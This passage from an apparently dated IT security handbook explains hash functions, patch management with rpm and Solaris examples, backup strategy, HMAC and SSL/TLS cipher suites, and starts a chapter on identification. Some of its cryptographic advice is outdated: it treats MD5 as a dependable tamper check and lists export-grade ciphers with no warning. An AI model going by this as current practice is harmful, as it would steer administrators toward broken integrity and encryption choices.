cryptosystems are public key encryption systems that are based on an elliptic curve rather than on a traditional logarithmic function. The advantage to using elliptic curve systems stems from the fact that there are no known computationally feasible algorithms for computing discrete logarithms of elliptic curves. Thus, short keys in elliptic curve cryptosystems can offer a high degree of confidentiality and security, while remaining very fast to calculate. Elliptic curves can also be computed very efficiently in hardware. RSA RSA is a well-known public key cryptography system developed in 1977 by three professors then at MIT: Ronald Rivest, Adi Shamir, and Leonard Adleman. RSA can be used both for encrypting information and as the basis of a digital signature system. Digital signatures can be used to prove the authorship and authenticity of digital information. The key may be any length, depending on the particular implementation used. Message Digest Functions Message digest functions distill the information contained in a file (small or large) into a single large number, typically between 128 and 256 bits in length. The best message digest functions combine these mathematical properties: a. Every bit of the message digest function's output is potentially influenced by every bit of the function's input. b. If any given bit of the function's input is changed, every output bit has a 50 percent chance of changing. c. Given an input file and its corresponding message digest, it should be computationally infeasible to find another file with the same message digest value. In theory, two different files can have the same message digest value. This is called a collision. For a message digest function to be secure, it should be computationally infeasible to find or produce these collisions. Many message digest functions have been proposed and are now in use. Here are a few: MD2 Message Digest #2, developed by Ronald Rivest. This message digest is probably the most secure of Rivest's message digest functions, but takes the longest to compute. As a result, MD2 is rarely used. MD2 produces a 128-bit digest. MD4 Message Digest #4, also developed by Ronald Rivest. This message digest algorithm was developed as a fast alternative to MD2. Subsequently, MD4 was shown to have a possible weakness. That is, it may be possible to find a PART file that produces the same MD4 as a given file without requiring a brute force search (which would be infeasible for the same reason that it is infeasible to search a 128- bit keyspace). MD4 produces a 128-bit digest. FIVE MD5 Message Digest #5, also developed by Ronald Rivest. MD5 is a modification of MD4 that includes techniques designed to make it more secure. Although widely used, in the summer of 1996 a few flaws were discovered in MD5 226 IT SECURITY FOR TECHNICAL ADMINISTRATORS that allowed some kinds of collisions in a weakened form of the algorithm to be calculated. As a result, MD5 is slowly falling out of favor. MD5 and SHA-1 are both used in SSL and in Microsoft's Authenticode technology. MD5 produces a 128-bit digest. SHA The Secure Hash Algorithm, related to MD4 and designed for use with the National Institute for Standards and Technology's Digital Signature Standard (NIST's DSS). Shortly after the publication of the SHA, NIST announced that it was not suitable for use without a small change. SHA produces a 160-bit digest. SHA-1 The revised Secure Hash Algorithm incorporates minor changes from SHA. It is not publicly known if these changes make SHA-1 more secure than SHA, although many people believe that they do. SHA-1 produces a 160-bit digest. SHA-256, SHA-384, SHA-512 These are, respectively, 256-, 384-, and 512-bit hash functions designed to be used with 128-, 192-, and 256-bit encryption algorithms. These functions were proposed by NIST in 2001 for use with the Advanced Encryption Standard. Besides these functions, it is also possible to use traditional symmetric block encryption systems such as the DES as message digest functions. To use an encryption function as a message digest function, simply run the encryption function in cipher feedback mode. For a key, use a key that is randomly chosen and specific to the application. Encrypt the entire input file. The last block of encrypted data is the message digest. Symmetric encryption algorithms produce excellent hashes, but they are significantly slower than the message digest functions described previously. Message digest functions are a powerful tool for detecting very small changes in very large files or messages; calculate the MD5 code for your message and set it aside. If you think that the file has been changed (either accidentally or on purpose), simply recalculate the MD5 code and compare it with the MD5 that you originally calculated. If they match, you can safely assume that the file was not modified. Because of their properties, message digest functions are also an important part of many cryptographic systems in use today. Message digests are the basis of most digital signature standards. Instead of signing the entire document, most digital signature standards specify that the message digest of the document be calculated. It is the message digest, rather than the entire document, which is actually signed. Message digests can also be readily used for message authentication codes that use a shared secret between two parties to prove that a message is authentic. MACs are appended to the end of the message to be verified. (RFC 2104 describes how to use keyed hashing for message authentication.) MACs based on message digests provide the "cryptographic" security for most of the Internet's routing protocols. Maintaining Integrity Maintaining the integrity of information stored on your computers is critical to overall security and reliable operation. You must insure the integrity of your operating system, the integrity of your applications, and the integrity of your data. For operating systems and applications, this requires not only monitoring for unwanted changes to your software, but also applying necessary security patches and updates to keep your software protected. Keeping Systems Up to Date From the moment a workstation or server is connected to the Internet, it is open to discovery and attempted access by unwanted outsiders. Attackers find new Internet hosts with amazing speed. Detailed reports on the Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 227 aggressiveness of attackers can be found at the website maintained by The Honeynet Project, http://project.honeynet.org/. In one case, a newly-configured Honeynet system was successfully penetrated 15 minutes after the computer was placed on the network. It is thus imperative that any system that will be on a network be kept up-to-date with security fixes ­ both before connecting it to the network and after. Software Management Systems A software management system is a set of tools and procedures for keeping track of which versions of what software you've got installed, and whether any local changes have been made to the software or its configuration files. Without such a system, it is impossible to know whether a piece of software needs to be updated or what local changes have been made and need to be preserved after the update. Using some software management system to keep up-to-date is essential for security purposes, and useful for non-security upgrades as well. Fortunately, nearly all Unix systems and Microsoft NT-based systems provide some form of software management for the core components of the operating system and applications distributed with it. The most common approaches are managing packages -- precompiled executables and supporting files -- and managing the software source code from which executables can be compiled and installed. Package-based Systems A typical package file is a file containing a set of executable programs, already compiled, along with any supporting files such as libraries, default configuration files, and documentation. Under most packaging systems, the package also contains some meta-data, such as: · Version information for the software it contains · Information about compatible operating system versions or hardware architectures · Lists of other packages that the package requires · Lists of other packages with which the package conflicts · Lists of which included files are configuration files (or otherwise likely to be changed by users once installed) · Commands to run before, during, or after the included files are installed The other important component of a package-based system is a database of which versions of which packages have been installed on the system. On Windows systems, the Registry often serves this purpose. Package-based systems are easy to use: with a simple command or two, a system administrator can install new software or upgrade their current software when a new or patched version is released. Because the packaged executables are already compiled for the target operating system and hardware platform, the administrator doesn't have to spend time building (and maybe even porting) the application. On the other hand, packages are compiled to work on the typical installation of the operating system, and not necessarily on your installation. If you need to tune your applications to work with some special piece of hardware, adapt them to an unusual authentication system, or simply compile them with an atypical configuration setting, source code will likely be more useful to you, if it is available. This is often the case with the kernel on Unix PART operating systems, for example. FIVE Commercial systems that don't provide source code are obvious candidates for package-based management. Solaris 2.x, for example, provides the pkgadd, pkgrm, pkginfo, and showrev commands (and others) for adding, removing, and querying packages from the shell, and admintool for managing software graphically. Microsoft Windows systems use the web-based Windows Update to download and install updates to the operating system and core utilities. 228 IT SECURITY FOR TECHNICAL ADMINISTRATORS Package management isn't only for commercial systems. Free software Unix distributions provide package management systems to make it easier for system administrators to keep the system up to date. Several Linux distributions have adopted the RPM Package Manager (RPM) system. This system uses a single command, rpm, for all of its package management functions. Debian GNU/Linux uses an alternative package management system called dpkg. The BSD-based Unix systems focus on source-based updates, but also provide a collection of precompiled packages that are managed with the pkg_ add, pkg_delete, and pkg_info commands. Source-based Systems In contrast to package-based systems, source-based systems focus on helping the system administrator maintain an up-to-date copy of the operating system's or application's source code, from which new executables can be compiled and installed. Source-based management has its own special convenience: a source-based update comes in only a single version, as opposed to compiled packages, which must be separately compiled and packaged for each architecture or operating system on which the software runs. Source-based systems can also be particularly useful when it's necessary to make local source code changes. From a security standpoint, building packages from source-code can be a mixed blessing. On the one hand, you are free to inspect the source-code and determine if there are any lurking bugs or Trojan horses. In practice, such inspection is difficult and rarely done. Moreover, if an attacker can get access to your source code, it is not terribly difficult for the attacker to add a Trojan horse of her own! To avoid this problem, you need to be sure both that the source code you are compiling is for a reliable application and that you have the genuine source code. Source code and patches The simplest approach to source management is to keep application source code available on the system and recompile it whenever it's changed. When a patch to an application is released, it typically takes the form of a patch diff, a file that describes which lines in the old version should be changed, removed, or added to in order to produce the new version. The diff program produces these files, and the patch program is used to apply them to an old version to create the new version. After patching the source code, the system administrator recompiles and reinstalls the application. For example, FreeBSD and related versions of Unix distribute many applications in their ports collection. An application in the ports collection consists of the original source code from the application's author along with a set of patches that have been applied to better integrate the application into the BSD environment. The makefiles included in the ports system automatically build the application, install it, and then register the application's files with the BSD pkg_add command. This approach is widely used for maintaining third-party software on FreeBSD systems. CVS Another approach to source management is to store the source code on a server using a source code versioning system such as the Concurrent Versions System (CVS), and configure the server to allow anonymous client connections. Users who want to update their source code to the latest release use the cvs program to "check out" the latest patched version from the remote server's repository. The updated code can then be compiled and installed. FreeBSD, NetBSD, and OpenBSD use CVS to distribute and maintain their core operating system software through CVS. In addition, tens of thousands of open source software projects maintain CVS servers of their own, or are hosted at sites such as sourceforge.net that provide CVS repositories. A good reference on CVS is Essential CVS, published by O'Reilly and Associates. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 229 Updating System Software It is imperative that you ensure that patches are available for all known security problems in the software you run, that you find those patches, and that you apply them ­ ideally, before the system is connected to a network. Similarly, once the system is up and running, you must be vigilant to learn about newly discovered security problems in your operating system and applications so as to apply patches for them as they become available. The most secure way to patch a new installation is to download the patches to another computer that's already connected to the Internet and updated with the latest security patches (perhaps a Mac or PC client that runs no server services). Once downloaded, they can be burned onto a CD or transferred to the new system using a local network connection, and applied. This approach is also convenient if you have many computers running the same operating system to update, and a slow network connection. Updates can be transferred once, and then applied on each machine from the CD. For Microsoft systems, the Windows Update Catalog web site provides downloadable updates that can be used in this fashion. If no other Internet-connected host is available or suitable, the new host may have to be connected before the patches are applied. In this case, disable all network servers on the machine, and make the connection as brief as possible -- only long enough to download the required patches -- and then physically remove the machine from the network while the patches are applied. This process can be made even more secure if the machine's connection can be protected by a stateful firewall or a router that implements network address translation, so that the only packets that can reach the new host are those associated with a connection initiated by the new host. You can't stay up-to-date with software that you don't know you've installed. An important component of any ongoing updating process is to inventory your system and keep track of new applications that you've installed. Operating systems that use packages usually provide commands that will let you determine which packages you have installed. Source-based software management typically relies on keeping all of the source code to the installed applications in a single location where it can be easily found. Learning about patches There are several avenues for learning about security problems and patches for operating systems and applications. · Every Unix operating system and most major applications, such as web servers, has an associated mailing list for announcements of new versions. Microsoft offers e-mail notification of security bulletins through the Microsoft Profile Center (http://register.microsoft.com/regsys/pic.asp). Many vendors maintain a separate list for announcements of security-related issues. Subscribe to these lists and pay attention to the messages. · Several mailing lists, such as BugTraq and NT-BugTraq, collect and distribute security alerts for many products. Subscribe to these lists (perhaps in digest form) and pay attention to the messages. · Many operating system and application developers post security and release announcements in relevant USENET newsgroups (for example, the BIND name server announcements appear in comp.protocols.dns.bind). Skim these newsgroups regularly. · If your vendor provides a subscription patch CD service, consider subscribing. Although these CDs may not provide up-to-the-minute patches, they can save a lot of time when bringing up a new system by reducing the number of patches that need to be downloaded. PART · Automatic update systems compare installed packages with the latest versions of packages available on the vendor's web site and report which packages are out-of-date. Most also can be configured to automatically FIVE download and install the upgraded packages, which can be useful if you don't change your configuration from the vendor defaults, and you trust the vendor to upgrade your system. Some can be run automatically on a scheduled basis; others must be run manually. · Finally, you can manually check the vendor's website on a regular basis for new versions of software. 230 IT SECURITY FOR TECHNICAL ADMINISTRATORS Once you learn about a security patch, don't wait ­ apply it immediately. Vulnerabilities that become public begin to be exploited almost immediately. (Patches that add new features, rather than fixing security vulnerabilities, do not require the same urgency). Downloading and Verifying Patches Whether you use packages or source code, you've got to get the files from somewhere. Vendors typically make their applications available on the Internet through the World-Wide Web or an anonymous FTP site. When an operating system or application is popular, however, a single Web site or FTP site can't keep up with the demand to download it, so many software vendors arrange to have other sites serve as mirrors for their site. Users are encouraged to download the software from the mirror site closest (in network geography) to them. In principle, all of the software on the vendor's site is replicated to each mirror site on a regular (often daily) basis. Mirror sites provide an important security benefit, by making the availability of software more reliable through redundancy. They are also useful when you have a fast network connection to the mirror site, but a slow connection to the principal site. On the other hand, mirror sites also create some security concerns: · The administrators of the mirror site control their local copies of the software, and may have the ability to corrupt it, replace it with a trojaned version, etc. You must trust not only the vendor but also the administrators of the mirror site. If the vendor distributes digital signatures along with the software (for example, detached PGP signatures with source code archives, gnupg signatures in rpm files, or ActiveX code signatures), you can be more sure that you're receiving the software as released by the vendor, as long as you acquire the vendor's public key directly ­ not through the mirror! Some update systems automatically check signatures before an update will be applied. · Even if you trust the mirror, daily updating may not be fast enough. If a critical security patch is released, you may not have time to wait 24 hours for your local mirror to be updated. In these cases, there is no substitute for downloading the patch directly from the vendor as soon as possible. Using a mirror site is thus a trade-off between the convenience of being able to get a high-speed download when you want it, and the necessity to possibly extend your trust to a third party. Be very wary of applying patches found in mailing lists and on bulletin boards: at worst, they may be planted to trick people into installing a new vulnerability. At best, they are often produced by inexperienced programmers whose systems are unlike yours, so their solutions may cause more damage than they fix. Upgrading applications Under Unix-based package management systems, upgrading a package is usually a very simple procedure. For example, to upgrade the bzip2-devel package on a system that uses the RPM package manager: # ls -l *.rpm -rw-r--r-- 1 root root 33708 Apr 16 23:15 bzip2-devel-1.0.2-2.i386.rpm # rpm -K bzip2-devel-1.0.2-2.i386.rpm Check the checksum and signature) bzip2-devel-1.0.2-2.i386.rpm: md5 OK # rpm -Uvh bzip2-devel-1.0.2-2.i386.rpm Upgrade the package Preparing... ########################################### [100%] 1:bzip2-devel ########################################### [100%] # rpm -q bzip2-devel Confirm that the version is now 1.0.2-2 bzip2-devel-1.0.2-2 Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 231 Installing a Solaris security patch is similarly easy. After downloaded patch 104489-15.tar.Z from http://sunsolve.sun.com, the installpatch script bundled inside the patch archive is used to install the appropriate patch: % ls *.tar.Z 104489-15.tar.Z % uncompress *.Z % tar xf 104489-15.tar % cd 104489-15 % ls .diPatch* SUNWtltk/ backoutpatch* postbackout* Install.info* SUNWtltkd/ installpatch* postpatch* README.104489-15SUNWtltkm/ patchinfo* % su Password: password # ./installpatch . Checking installed patches... Generating list of files to be patched... Verifying sufficient filesystem capacity (exhaustive method)... Installing patch packages... Patch number 104489-15 has been successfully installed. See /var/sadm/patch/104489-15/log for details Executing postpatch script... Patch packages installed: SUNWtltk SUNWtltkd SUNWtltkm # showrev -p | egrep 104489 Patch: 104489-01 Obsoletes: Packages: SUNWtltk, SUNWtltkd Patch: 104489-14 Obsoletes: Packages: SUNWtltk, SUNWtltkd, SUNWtltkm Patch: 104489-15 Obsoletes: Packages: SUNWtltk, SUNWtltkd, SUNWtltkm If you're using source-based management, upgrading involves either a CVS checkout of the updated source code or applying a patch file to the old source code to update it. In either case, the source code must then be recompiled and reinstalled. Here is an example of applying a patch to an application: % ls -ld * -rw-rw---- 1 dunemush dunemush 188423 Jul 20 12:07 1.7.5-patch09 drwx------ 10 dunemush dunemush 4096 Jul 4 16:15 pennmush/ PART % cd pennmush % patch -p1 -s < ../1.7.5-patch09 FIVE % make ....source code compile messages... % make install ...installation messages... % 232 IT SECURITY FOR TECHNICAL ADMINISTRATORS If you're upgrading a server program, of course, you will need to stop the running server process and restart it to run the newly installed version -- simply changing the server program on disk is not sufficient! Upgrading applications on Microsoft Windows systems is typically more eccentric. If the application is one of the core Microsoft applications, like Internet Explorer or Media Player, Windows Update will handle patches. But each third-party application must provide its own approach to upgrades. Some may require you to remove the older version and install the new one, others may suggest you simply install the new version over the older, and others may have their own built-in update functionality (antivirus engines are particularly notable in this regard). You'll have to examine each application individually. Backing Out and Backing Up Not every upgrade is a panacea. Sometime upgrades cause more problems than they solve, either because they break important functionality, or they don't provide the desired fix. It's important to be able to revert to the pre-upgrade software if the upgrade should prove troublesome. There are two basic strategies for recovering from a bad upgrade. First, it may be possible to "back out" the patch and reinstall the earlier version. Under source-based management systems, the patch program can also be used to remove a previously applied patch, or the earlier version can be checked out from a CVS repository. It can be more difficult to cleanly back out a package. Although most package management software provides a way to overwrite an installed package with an earlier version, if the package dependencies have also been updated, older version of the dependencies may also have to be located and installed. Many, but not all, Microsoft patches are capable of uninstalling themselves or provide uninstall instructions. A second strategy for source-based systems is to locally back up older versions of software. By keeping older versions of source code, it's generally not difficult to reinstall the earlier version. Multiple versions can be kept in separate directories in /usr/src, or a version control system such as RCS or CVS can be used locally to track multiple versions of software in the same directory. Perhaps the most reliable method is to perform a full backup of your system prior to the changes. Then, if the upgrade goes badly, you can restore your system to the prior state. Integrity Monitoring Insuring that system software is up to date when new patches are released is an important part of maintaining integrity. Equally important is insuring that system software ­ and your valuable data ­ doesn't change when you don't expect it to. Ideally, no unauthorized user or process would be able to tamper with your information; good server information practices reduce the likelihood of someone gaining privileges they shouldn't have. In practice, however, it's necessary to monitor your data on an ongoing basis so that you can discover tampering if it should occur, and to archive your data so you can restore it to a correct state. Tampering There are several ways to safeguard against tampering. In addition to using care in the organization of user and file permissions, critical files that change infrequently can be kept on read-only media. Files can also be encrypted so that additional passwords are required to covertly modify the information they contain (though it may be possible to corrupt or delete the files themselves). Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 233 There are also many approaches to detecting tampering. For smaller systems or when there are a limited number of key files to protect, making backups of the files on write-once media can be an effective strategy. Files can be regularly compared to their archived counterparts, and if a file is corrupted, the backup can be used to restore it. Of course, when an authorized change is made to a file, the backup must also be updated. Cryptographic digests of important files can be computed and stored off-line or protected by encryption. As noted earlier, an important property of cryptographic digests is that it is infeasible to generate a new file that will match a given digest. Some antivirus systems can perform a similar function, often called "inoculation", in which checksums are inserted into executable files themselves. Chapter 5 discusses the use of comparison files and cryptographic digests for ongoing auditing of system data in greater detail. Backups Bugs, accidents, natural disasters, and attacks on your system cannot be predicted. Often, despite your best efforts, they can't be prevented. But if you have backups, you can compare your current system and your backed-up system, and you can restore your system to a stable state. Even if you lose your entire computer--to fire, for instance--with a good set of backups you can restore the information after you have purchased or borrowed a replacement machine. Insurance can cover the cost of a new CPU and disk drive, but your data is something that in many cases can never be replaced. Years ago, making daily backups was a common practice because computer hardware would often fail for no obvious reason. A backup was the only protection against data loss. Today, hardware failure is still a good reason to back up your system. Hard disk failures are a random process: even though a typical hard disk will now last for five years or more, an organization that has 20 or 30 hard disks can expect a significant drive failure every few months. Drives frequently fail without warning--sometimes only a few days after they have been put into service. It's prudent, therefore, to back up your system on a regular basis. Backups can also be an important tool for securing computers against attacks. Specifically, a full backup allows you to see what an intruder has changed, by comparing the files on the computer with the files on the backup. Make your first backup of your computer after you install its operating system, load your applications, and install all of the necessary security patches. Not only will this first backup allow you to analyze your system after an attack to see what has been modified, but it will also save the time of rebuilding your system from scratch in the event of a hardware failure. How to back up There are many different forms of backups in use today. Here are just a few: · Copy your critical files to a high-density removable magnetic or optical disk. · Periodically copy your disk to a spare or "mirror" disk. · Instantaneously mirror two disks using either software or hardware RAID systems. · Make periodic zip, "sit" or "tar" archives of your important files. You can keep these backups on your primary system or you can copy them to another computer, possibly at a different location. PART · Make backups onto magnetic or optical tape. · Back up your files over a network or over the Internet to another computer that you own, or to an Internet FIVE backup service. Some of these services can be exceedingly sophisticated. For example, the services can examine the MD5 checksums of your files and only back up files that are "unique." Thus, if you have a thousand computers, each with a copy of Microsoft Office, none of those application files need to be copied over the network to add them to the backup. 234 IT SECURITY FOR TECHNICAL ADMINISTRATORS What to back up There are two approaches to computer backup systems: 1. Back up everything that is unique to your system--user accounts, data files, and important system directories that have been customized for your computer. This approach saves tape or disk and decreases the amount of time that a backup takes; in the event of a system failure, you recover by reinstalling your computer's operating system, reloading all of the applications, and then restoring your backup tapes. 2. Back up everything, because restoring a complete system is easier than restoring an incomplete one, and tape is cheap. The second approach should generally be preferred. While some of the information you back up is already "backed up" on the original distribution disks or tapes you used to load the system onto your hard disk, distribution disks or tapes sometimes get lost. Furthermore, as your system ages, programs get installed in the operating system's reserved directories as security holes get discovered and patched, and as other changes occur. If you've ever tried to restore your system after a disaster, you know how much easier the process is when everything is in the same place. For this reason, it is recommended that you store everything from your system (and that means everything necessary to reinstall the system from scratch--every last file) onto backup media at regular, predefined intervals. How often you do this depends on the speed of your backup equipment and the amount of storage space allocated for back- ups, as well as the needs of your organization. You might want to do a total backup once a week, or you might want to do it only twice a year. Types of Backups There are three basic types of backups: Level-zero backup Makes a copy of your original system. When your system is first installed, before people have started to use it, back up every file and program on the system. Such a backup can be invaluable after a break-in. Full backup Makes a copy to the backup device of every file on your computer. This method is similar to a day-zero backup, except that you do it on a regular basis. Incremental backup Makes a copy to the backup device of only those items in a filesystem that have been modified after a particular event (such as the application of a vendor patch) or date (such as the date of the last full backup).Full backups and incremental backups work together. A common backup strategy is: · Make a full backup on the first day of every other week. · Make an incremental backup every evening of everything that has been modified since the last full backup. This kind of incremental backup is sometimes called a differential backup, as it archives those files that differ since the last full backup. Most administrators of large systems plan and store their backups by disk drive or partition. Different partitions usually require different backup strategies. Some partitions, such as your system partitions (if they are separate), should probably be backed up whenever you make a change to them, on the theory that every change that you make to them is too important to lose. You should use full backups with these systems, rather than incremental backups, because they are only usable in their entirety. Likewise, partitions that are used solely for storing Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 235 application programs really only need to be backed up when new programs are installed or when the configuration of existing programs is changed. On the other hand, partitions that are used for keeping user files are more amenable to incremental backups. But you may wish to make such backups frequently, to minimize the amount of work that would be lost in the event of a failure. When you make incremental backups, use a rotating set of backup disks or tapes. The backup you do tonight shouldn't write over the tape you used for your backup last night. Otherwise, if your computer crashes in the middle of tonight's backup, you would lose the data on the disk, the data in tonight's backup (because it is incomplete), and the data in last night's backup (because you partially overwrote it with tonight's backup). Ideally, perform an incremental backup once a night, and have a different tape for every night of the week. How Long Should You Keep a Backup? It may take a week or a month to realize that a file has been deleted. Therefore, you should keep some backup tapes for a week, some for a month, and some for several months. Many organizations make yearly or quarterly backups that they archive indefinitely. Some organizations decide to keep their yearly or biannual backups "forever" -- it's a small investment in the event that it should ever be needed again. In some countries, there may be legal requirements that backups of specific kinds of data (such as accounting records) be kept for a minimum period. On the other hand, it may be important to have a "data destruction" policy that specifies the maximum time backups may be kept. You may wish to keep on your system an index or listing of the names of the files on your backup tapes. This way, if you ever need to restore a file, you can find the right tape to use by scanning the index, rather than by reading in every single tape. Having a printed copy of these indices is also a good idea, especially if you keep the online index on a system that may need to be restored! If you keep backups for a long period of time, be sure to migrate the data on your backups each time you purchase a new backup system. Otherwise, you might find yourself stuck with tapes that can't be read by anyone, anywhere. This has happened to major research universities and even the U.S. National Aeronautics and Space Administration. Other Backup Tips There are several other good ways to increase the reliability of your backups: Use redundant backup sets You can use two distinct sets of backup tapes to create a tandem backup. With this backup strategy, you create two complete backups (call them A and B) on successive backup occasions. Then, when you perform your first incremental backup, the "A incremental," you back up all of the files that were created or modified after the last A backup, even if they are on the B backup. The second time you perform an incremental backup, the "B incremental," you write out all of the files that were created or modified since the last B backup (even if they are on the A incremental backup.) This system protects you against media failure, because every file is backed up in PART two locations. It does, however, double the amount of time that you will spend performing backups. FIVE Replace tapes as needed Tapes are physical media, and each time you run them through your disk drive they degrade somewhat. Based on your experience with your tape drive and media, you should set a lifetime for each tape. Some vendors establish limits for their tapes (for example, 3 years or 2000 cycles), but others do not. Be certain to see what the vendor 236 IT SECURITY FOR TECHNICAL ADMINISTRATORS recommends--and don't push that limit. The few pennies you may save by using a tape beyond its useful range will not offset the cost of a major loss. Keep your tape drives clean If you make your backups to tape, follow the preventative maintenance schedule of your tape drive vendor, and use an appropriate cleaning cartridge or other process as recommended. Being unable to read a tape because a drive is dirty is inconvenient; discovering that the data you've written to tape is corrupt and no one can read it is a disaster. Verify the backup On a regular basis you should attempt to restore a few files chosen at random from your backups, to make sure that your equipment and software are functioning properly. Stories abound about computer centers that have lost disk drives and gone to their backup tapes, only to find them all unreadable. This scenario can occur as a result of bad tapes, improper backup procedures, faulty software, operator error, or other problems. At least once a year, you should attempt to restore your entire system completely from backups to ensure that your entire backup system is working properly. Starting with a different, unconfigured computer, see if you can restore all of your tapes and get the new computer operational. Sometimes you will discover that some critical file is missing from your backup tapes. These practice trials are the best times to discover a problem and fix it. A related exercise that can prove valuable is to pick a file at random, once a week or once a month, and try to restore it. Not only will this reveal if the backups are comprehensive, but the exercise of doing the restoration may also provide some insight. An in-depth discussion of backup and restore systems can fill a book --W. Curtis Preston's book, Unix Backup & Recovery, published by O'Reilly and Associates, is an excellent one. Transmission Integrity Cryptography also provides the solution to the problem of insuring that when you transmit data to someone else over a network the recipient receives the data as you sent it, protected from accidental corruption or intentional tampering. A typical strategy involves digitally signing the file, by computing a cryptographic digest and encrypting the digest with a symmetric or asymmetric algorithm, and then sending it along with the file (which may itself be encrypted for confidentiality) along with the file. The recipient recomputes the digest from the file and then decrypts the transmitted digest. If they match, the message's integrity is ensured. A Hash Message Authentication Code (HMAC) function is another technique for verifying the integrity of a message transmitted between two parties that agree on a shared secret key. Essentially, HMAC combines the original message and a key to compute a message digest function of the two. Sometimes additional information, such as protocol sequence numbers, are included as well, to thwart replay attacks. The sender of the message computes the HMAC of the message, the key, and any additional information and transmits the HMAC with the original message. The recipient recalculates the HMAC using the message and the recipient's copy of the secret key (along with any additional information, such as the expected sequence number), then compares the received HMAC with the calculated HMAC to see if they match. If the two HMACs match, then the recipient knows that the original message has not been modified, because the message digest hasn't changed, and that it is authentic, because the sender knew the shared key, which is presumed to be secret. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 237 HMACs are often used to harden network protocol messages against tampering, because they are much faster to calculate than digital signatures. They are also typically smaller in size. However, HMACs are based on a shared key that must be protected from compromise, while digital signatures are usually performed with public key systems. Several general cryptographic protocols have been developed to secure network connections. These protocols are typically built from a combination of cryptographic algorithms to support key exchange, authentication, encryption, and message authentication codes, along with specifications for how a client and a server will agree on algorithms and exchange credentials and session keys. For example, the SSL/TLS protocol supports these combinations of algorithms: EDH-RSA-DES-CBC3-SHA SSLv3 Kx=DH Au=RSA Enc=3DES(168) Mac=SHA1 EDH-DSS-DES-CBC3-SHA SSLv3 Kx=DH Au=DSS Enc=3DES(168) Mac=SHA1 DES-CBC3-SHA SSLv3 Kx=RSA Au=RSA Enc=3DES(168) Mac=SHA1 DHE-DSS-RC4-SHA SSLv3 Kx=DH Au=DSS Enc=RC4(128) Mac=SHA1 RC4-SHA SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=SHA1 RC4-MD5 SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=MD5 EXP1024-DHE-DSS-RC4-SHA SSLv3 Kx=DH(1024) Au=DSS Enc=RC4(56) Mac=SHA1 export EXP1024-RC4-SHA SSLv3 Kx=RSA(1024) Au=RSA Enc=RC4(56) Mac=SHA1 export EXP1024-DHE-DSS-DES-CBC-SHA SSLv3 Kx=DH(1024) Au=DSS Enc=DES(56) Mac=SHA1 export EXP1024-DES-CBC-SHA SSLv3 Kx=RSA(1024) Au=RSA Enc=DES(56) Mac=SHA1 export EXP1024-RC2-CBC-MD5 SSLv3 Kx=RSA(1024) Au=RSA Enc=RC2(56) Mac=MD5 export EXP1024-RC4-MD5 SSLv3 Kx=RSA(1024) Au=RSA Enc=RC4(56) Mac=MD5 export EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH Au=RSA Enc=DES(56) Mac=SHA1 EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH Au=DSS Enc=DES(56) Mac=SHA1 DES-CBC-SHA SSLv3 Kx=RSA Au=RSA Enc=DES(56) Mac=SHA1 EXP-EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH(512) Au=RSA Enc=DES(40) Mac=SHA1 export EXP-EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH(512) Au=DSS Enc=DES(40) Mac=SHA1 export EXP-DES-CBC-SHA SSLv3 Kx=RSA(512) Au=RSA Enc=DES(40) Mac=SHA1 export EXP-RC2-CBC-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC2(40) Mac=MD5 export EXP-RC4-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC4(40) Mac=MD5 export Each algorithm-combination specifies an algorithm to use for key exchange (Kx, which may be Diffie-Hellman or RSA), authentication (Au, which may be RSA or DSS), encryption (Enc, which may be DES, Triple-DES, RC4, or RC2, with the key length shown), and message access codes (Mac, which may be SHA1 or MD5). PART FIVE 238 IT SECURITY FOR TECHNICAL ADMINISTRATORS CHAPTER 5. IDENTIFICATION AND AUTHENTICATION At a Glance Identification actually comprises three concepts. Strictly speaking, identification is the associating of an identity with a subject. Authentication is establishing the validity of an identity. Authorization is associating rights or privileges with a subject. This chapter is concerned primarily with the first two concepts. Identification and authentication may be performed solely by the workstation that a subject is using, or may involve a network-based authentication system in which user identities are stored by a central server and shared by groups of client workstations. Identification Techniques Computers use a variety of user identification systems. The simplest are based on usernames and passwords; others are based on special-purpose hardware that can measure unique distinguishing characteristics of different human beings. Finally, there are systems that are based on public-key cryptography. No identification techniques are foolproof. Fortunately, most of them don't have to be. The goal of most identification systems isn't to eliminate the possibility of impersonation, but to reduce to acceptable levels the risk of impersonation and the resulting losses. Another important goal of identification systems is to quantify the amount of risk that remains once the system has been deployed: quantifying the amount of residual risk allows an organization to make decisions about policies, the need or desirability of alternative identification systems, and even the amount of insurance coverage necessary to protect against the remaining amount of fraud. Physical Identification Fly to an international airport, flash two pieces of plastic, and you can drive away with a brand new car worth more than $20,000. The only assurance the car rental agency has that you will return its automobile is your word--and the knowledge that if you break your word, they can destroy your credit rating and possibly have you thrown in jail. Your word wouldn't mean much to the rental agency if they didn't know who you were. It's your driver's license or passport and credit card, combined with a worldwide computer network, that allows the rental agency to determine in seconds if your credit card has been reported stolen, and that gives the firm and its insurance company the willingness to trust you. The key features of physical identification are based on the design of identification documents. A passport is a good identification document because it contains information that can be verified physically (sex, height, weight, age, photograph, signature), is difficult to forge, is resistant to tampering and easily shows tampering attempts, and is issued by a reliable and reputable authority that takes care to verify the subject's identity before issuing the document. On the other hand, a paper club membership card has none of these features. Computer-Based Identification Techniques For more than fifty years, usernames and passwords have been a part of large-scale computer systems. Even personal computers, which lacked passwords for the first two decades of their existence, now come equipped with software that can control access using usernames and passwords. There is a key difference that separates username/password systems from the document-based systems discussed earlier in this chapter. Whereas most Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 239 identification documents are printed with the true name of the individual being identified, username/password- based systems are only interested in establishing that the person who is sitting at the keyboard is the authorized user of a particular account. Traditional document-based systems concern themselves with absolute identification, whereas username/password systems are concerned with relative identification or the continuity of identification. Absolute identification is an extraordinarily difficult task for the typical computer system to 